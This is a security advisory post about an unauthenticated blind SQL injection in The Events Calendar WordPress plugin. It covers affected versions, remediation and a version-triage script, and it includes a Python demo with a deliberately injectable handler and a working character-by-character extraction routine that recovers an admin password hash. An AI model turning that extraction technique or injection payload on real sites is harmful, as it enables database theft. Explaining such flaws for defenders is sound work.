The Events Calendar CVE-2026-49772: Unauth SQL Injection, Patch Now
The Events Calendar, a WordPress plugin on 700,000+ sites, has a critical flaw (CVE-2026-49772, severity 9.3) that lets anyone read the database with no login. Here are the affected versions, how to check your site, and how to update to 6.16.3 now.

Makoto Horikawa
Backend Engineer / AWS / Django
A serious vulnerability has been found in The Events Calendar, a popular WordPress plugin used by sites worldwide to display event schedules and calendars. It is tracked as CVE-2026-49772. A third party with no account on the site at all can send a crafted request and read the contents of the database directly.
The plugin is installed on more than 700,000 sites through the official directory, so the blast radius is very wide. The severity is rated 9.3 out of 10, classified as "critical." The developer, StellarWP, has already shipped a fix (version 6.16.3), and the current latest version is 6.16.4. If you are running an older version, update now.
What we know so far
- Affected: the WordPress plugin "The Events Calendar," versions 6.15.12 through 6.16.2 (Patchstack)
- Type: SQL injection (CWE-89), where crafted input lets an attacker alter the query the site sends to its database. It is a "blind" SQL injection: the query results are never displayed, so the attacker infers them one piece at a time from differences in the response
- Exploitation requires no login (unauthenticated) and is reachable over the internet. Severity is 9.3 (critical) out of 10 (NVD)
- The fix shipped in 6.16.3 (latest is 6.16.4). It was found by security researcher "vtim" and reported via Patchstack. No confirmed reports of exploitation in the wild so far
What is The Events Calendar?
The Events Calendar is a plugin that adds an "event list" and "calendar view" to a WordPress site. It is used to show seminars, exhibitions, events run by local governments and nonprofits, store campaigns, and class schedules in a browser-based calendar or list. The developer, StellarWP (part of Liquid Web / Nexcess in the US), makes many staple tools for WordPress, and The Events Calendar is among its flagship products, installed on more than 700,000 sites. There is a free version plus paid versions that add features such as ticket sales.
A plugin is an "add-on part" that bolts extra features onto WordPress core. Convenient, but a single hole in one of those parts puts the whole site at risk. What makes this flaw nasty is that the attack needs no login at all. A complete stranger who is neither a member nor an administrator can pull it off just by sending a calendar-related request from outside. WordPress sites are said to power over 40% of the web, and an unauthenticated hole in a popular plugin like this is a prime target for mass automated attacks that sweep through sites worldwide one after another.
A back door to the records cabinet, left unlocked on 700,000 sites at once
The first to chase this hole are not people with a personal grudge. They are bot operators who scan the whole internet for vulnerable sites, resale gangs who sell stolen lists on underground markets, initial access brokers who probe for entry points and sell them to ransomware crews, and spam and scam outfits hungry for event attendees' contact details. What they want is not how the site looks, but what sits in the database behind it: the names and email addresses of members and event attendees, the contact and payment details of ticket buyers, and the hashed passwords of administrator accounts. (WordPress's authentication keys and salts live in wp-config.php, not in the database, so a read-only SQL injection does not directly hand over the material needed to forge a login cookie; the password hashes are the prize.) The moment CVE-2026-49772 is exploited, these lists and hashes are siphoned straight out of the database without ever passing the login screen.
What happens next does not end with a single leak. A stolen attendee list is first resold on underground markets, and then phishing emails dressed up as "the event has been canceled" or "we are refunding your fee" are sent to that very list. Wrapped in a familiar event context, those fake messages are hard to tell from the real thing, and recipients end up entering their details into a fake payment page. The attacker also takes the stolen, hashed administrator passwords, cracks them over time, and seizes the WordPress dashboard itself. From there the site gets defaced, turned into a launch pad for serving malware to visitors, or made the entry point for ransomware.
And the responsibility for this whole chain falls back on whoever runs the site. The local government, nonprofit, class, or shop hosting the event is the party holding attendees' personal data. If a leak occurs, they may be required, depending on the applicable law, to report it to the data protection authority and notify the people affected, and they carry the heavy burden of inquiry handling and lost trust. The figure "9.3" does not capture this kind of loss, where the site never goes down yet the entrusted list is quietly drained away. The smaller the operation, with no dedicated staff, the harder the breach is to notice, and whether you can apply the update now is what decides your attendees' safety.
CVE-2026-49772: querying the database directly with crafted input
According to the Patchstack advisory and the NVD record, CVE-2026-49772 is a SQL injection (CWE-89) in The Events Calendar. SQL injection is a flaw that arises when a site mixes user-supplied strings straight into the statements (SQL) it sends to its database. The attacker slips commands to the database — rather than ordinary data — into an input field or URL parameter, making the site run queries it never intended. Here the result is not shown directly on the page, so it is classified as "blind SQL injection," where the contents are inferred and extracted one character at a time from differences in the response (success or failure, shown or not).
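To make the "blind" part concrete, here is an added example, written for this article rather than taken from the plugin, the advisory, or Patchstack: a small Python program against an in-memory SQLite database with constructed sample tables. `events_vulnerable` is a hypothetical handler that splices a request parameter into its SQL text, the pattern CWE-89 describes; `events_hardened` runs the same query with a bound parameter. `blind_extract` then recovers a value using nothing but a yes/no signal (does the response list any events?), which is what "one character at a time" means in practice. The table names, the payload shape, and the placeholder hash are all assumptions for the demo and say nothing about how the real flaw is triggered.

```python
import sqlite3

# Constructed sample data for the demo (not real site data): one admin row with a
# placeholder hash, and two events, one of which falls on the probe date.
SAMPLE_USERS = [(1, "admin", "$P$Bexample0hash")]
SAMPLE_EVENTS = [
    (10, "Spring seminar", "2026-01-01"),
    (11, "Autumn fair", "2026-09-12"),
]
PROBE_DATE = "2026-01-01"  # a date that really has an event, so a TRUE condition shows rows


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE wp_users (ID INTEGER, user_login TEXT, user_pass TEXT)")
    con.executemany("INSERT INTO wp_users VALUES (?, ?, ?)", SAMPLE_USERS)
    con.execute("CREATE TABLE wp_events (ID INTEGER, title TEXT, event_date TEXT)")
    con.executemany("INSERT INTO wp_events VALUES (?, ?, ?)", SAMPLE_EVENTS)
    return con


def events_vulnerable(con, date):
    """Hypothetical CWE-89 pattern: the request parameter is spliced into the SQL text."""
    sql = f"SELECT title FROM wp_events WHERE event_date = '{date}'"
    return [row[0] for row in con.execute(sql)]


def events_hardened(con, date):
    """Same query with a bound parameter: the value is data and can never change the statement."""
    sql = "SELECT title FROM wp_events WHERE event_date = ?"
    return [row[0] for row in con.execute(sql, (date,))]


def oracle(con, handler, condition):
    """Boolean oracle: TRUE if the response lists events after injecting `condition`.

    The payload closes the string literal, appends the condition, and comments
    out the rest of the original statement.
    """
    payload = f"{PROBE_DATE}' AND ({condition}) --"
    return len(handler(con, payload)) > 0


def blind_extract(con, handler, expr, max_len=64):
    """Recover the value of SQL expression `expr` using only yes/no answers.

    Returns (value, number_of_requests). The length is found first, then each
    character by binary search over printable ASCII (6 or 7 requests per character).
    """
    requests = 0
    for length in range(max_len + 1):  # keep asking "is it longer than this?"
        requests += 1
        if not oracle(con, handler, f"length({expr}) > {length}"):
            break
    out = []
    for pos in range(1, length + 1):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            requests += 1
            if oracle(con, handler, f"unicode(substr({expr}, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out), requests


# The value an attacker would go after: a subquery for the admin's password hash.
ADMIN_HASH_EXPR = "(SELECT user_pass FROM wp_users WHERE user_login = 'admin')"

if __name__ == "__main__":
    con = make_db()
    print("vulnerable handler:", blind_extract(con, events_vulnerable, ADMIN_HASH_EXPR))
    print("hardened handler:  ", blind_extract(con, events_hardened, ADMIN_HASH_EXPR))
```

Against the vulnerable handler the loop pulls the whole placeholder hash out in roughly 120 requests, none of which ever displays the hash itself; against the hardened handler the very first probe fails and nothing is recovered, because the bound parameter is compared as a date string and the injected SQL never reaches the parser.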
The technical scoring (CVSS v3 vector) is AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L, for a score of 9.3. In short: over the internet (AV:N), under simple conditions (AC:L), with no login (PR:N) and no user interaction (UI:N), the impact reaches beyond the plugin to the rest of the site (S:C), the database contents can be read (C:H), data is not modified (I:N), and availability is only slightly affected (A:L). The combination to watch is PR:N (no privileges) and AV:N (network reachable): unauthenticated and reachable by anyone over the internet, the conditions most prone to mass exploitation. Data tampering (I:N) is not directly in scope, but the stolen administrator hashes can serve as a foothold that ultimately leads to a full takeover of the site.
Affected versions and how to check your own site
What you are exposed to and what to do depend on the version you are running. In the WordPress dashboard, open "Plugins" and check the version number of The Events Calendar. Use the table below to find your situation, then update to 6.16.3 or later.
| Version in use | Status | What to do |
|---|---|---|
| 6.15.12 – 6.16.2 | At risk (vulnerable) | Update to 6.16.3+ immediately |
| 6.15.11 or earlier | Check (other known flaws) | Update to the latest version |
| 6.16.3 | Patched | No action (latest recommended) |
| 6.16.4 (latest) | Safe | No action |
The Events Calendar also has a paid extension (The Events Calendar Pro) and a ticketing feature (Event Tickets). Because the free core is what is affected here, sites that run the extensions still need to bring the core up to 6.16.3 or later. Sites that use ticket sales should treat this as higher priority, since buyers' personal data lives in the database.
What to do right now
The top priority is updating the plugin. In the WordPress dashboard, open "Plugins" → "Updates" and update The Events Calendar to 6.16.3 or later (ideally the latest 6.16.4). Sites with auto-updates enabled may already be patched, but it is worth checking the version number by eye to be sure. If you manage multiple sites, list each site's version in your management tool and flag anything on 6.16.2 or earlier.
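For the multi-site check, here is an added helper, not part of this site's tooling or the plugin: it takes an inventory of (site, installed version, sells tickets) and applies the version ranges from the table above, putting vulnerable ticket-selling sites at the top of the list. It compares versions numerically, because comparing them as strings would sort a hypothetical "6.16.10" before "6.16.2" and misclassify it. The inventory is constructed sample data; the hostnames are placeholders.

```python
# Version ranges from the advisory as quoted in this article.
VULNERABLE_FROM = (6, 15, 12)   # first affected release
VULNERABLE_TO = (6, 16, 2)      # last affected release
FIXED_IN = (6, 16, 3)


def parse_version(text):
    """'6.16.2' -> (6, 16, 2); short forms such as '6.16' are padded to three components.

    Tuples of ints compare numerically, avoiding the string trap where '6.16.10' < '6.16.2'.
    """
    parts = [int(p) for p in text.strip().split(".")]
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


def classify(version):
    """Map one installed version onto the rows of the table above."""
    v = parse_version(version)
    if VULNERABLE_FROM <= v <= VULNERABLE_TO:
        return "vulnerable"
    if v < VULNERABLE_FROM:
        return "check"      # outside the CVE-2026-49772 range, but old: update anyway
    return "patched"        # FIXED_IN or later


PRIORITY = {"vulnerable": 0, "check": 1, "patched": 2}


def triage(inventory):
    """inventory: iterable of (site, version, sells_tickets).

    Returns (site, version, status, sells_tickets) rows ordered so that vulnerable
    sites come first, ticket-selling sites ahead within each status, then by name.
    """
    rows = [(site, ver, classify(ver), tickets) for site, ver, tickets in inventory]
    rows.sort(key=lambda r: (PRIORITY[r[2]], not r[3], r[0]))
    return rows


# Constructed sample inventory (placeholder hostnames). "6.16.10" is a hypothetical
# future release included only to show that numeric ordering handles it.
SAMPLE_INVENTORY = [
    ("events.example.org", "6.16.2", False),
    ("tickets.example.net", "6.15.12", True),
    ("blog.example.com", "6.16.4", False),
    ("old.example.edu", "6.14.1", False),
    ("shop.example.io", "6.16.10", True),
]

if __name__ == "__main__":
    for site, ver, status, tickets in triage(SAMPLE_INVENTORY):
        print(f"{status:10} {site:22} {ver:8} {'tickets' if tickets else ''}")
```

Feed it the versions your management tool reports and work the list from the top; anything marked "check" is not in this CVE's range but is old enough to warrant the same update run.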
If you cannot update right away, one stopgap is to block SQL-injection-like requests with a WAF (web application firewall). Virtual patching from Patchstack or a security plugin can buy time until you update the core. This is only a temporary measure, though: a generic rule may not recognize every blind-injection payload, and the real fix is updating the plugin itself. After updating, check for suspicious login history, database anomalies, and unfamiliar administrator accounts. If you suspect the flaw was exploited before you patched, treat the password hashes as exposed: reset administrator passwords and rotate the authentication keys and salts in wp-config.php, which signs every user out and invalidates existing login cookies.
Because WordPress plugins like The Events Calendar share the same parts across the world, one hole means many sites get targeted at once. Knowing where each plugin you use came from and when it was last updated is the first step to preventing this kind of chain reaction. We publish an OSS supply chain scanner that lets you check across open-source components for reported vulnerabilities. For the latest status on flaws confirmed to be under active attack, see our CISA KEV dashboard. CVE-2026-49772 is not on the KEV list (the US CISA catalog of vulnerabilities under active attack) as of now, but because it is the kind of unauthenticated flaw prone to mass exploitation, it is safer to act without waiting for it to be listed.
Popular WordPress plugins keep getting targeted
Vulnerabilities in widely installed WordPress plugins have been reported extremely often of late. We have covered the actively exploited flaw in "Kirki" (CVE-2026-8206, 500,000 sites), where a password-reset weakness let attackers hijack administrators; a roundup of "Gravity Forms" and others, a staple form builder that shipped four flaws at once; and the flaw in "WPCode" (CVE-2026-8832), which allowed code execution from an editor-level account.
What these share is a pattern: an add-on installed for convenience quietly became an entry point. Unauthenticated flaws in particular pair well with automated attacks that mechanically sweep sites worldwide, and the time from disclosure to first exploitation keeps shrinking. Installing plugins is not the problem; the problem is leaving them un-updated afterward. Let CVE-2026-49772 be the prompt to take inventory of the plugins on your site and review your auto-update settings.